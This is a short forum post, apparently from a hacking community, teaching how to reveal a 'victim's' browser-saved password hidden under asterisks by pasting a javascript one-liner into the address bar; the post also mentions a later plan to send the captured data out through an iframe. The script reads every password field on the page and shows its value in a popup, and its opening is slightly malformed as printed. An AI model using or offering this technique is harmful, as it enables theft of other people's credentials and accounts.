View password under astriks javascript

Collapse
X
 
  • Time
  • Show
Clear All
new posts
  • unadkat
    DK Veteran
    • Dec 2008
    • 340

    #1

    View password under astriks javascript

    YOU NEED PHYSICAL ACCESS TO THE COMPUTER TO DO THIS!!! (unless you put it in an iframe and have it send you the info some how, but that is a tut another day )
    ok, basically all you do is goto a website that the victim saved the username/password combo (meaning the username and password are there, but the password is under *'s) then replace the address bar with:

    Code: Select all
    javascriptfunction(){var s,F,j,f,i; s = ""; F = document.forms; for(j=0; j<F.length; ++j) { f = F[j]; for (i=0; i<f.length; ++i) { if (f[i].type.toLowerCase() == "password") s += f[i].value + "\n"; } } if (s) alert("Passwords in forms on this page:\n\n" + s); else alert("There are no passwords in forms on this page.");})();


    After that click enter. A popup will come up with the password in plain text.

    Hope this helped,


Working...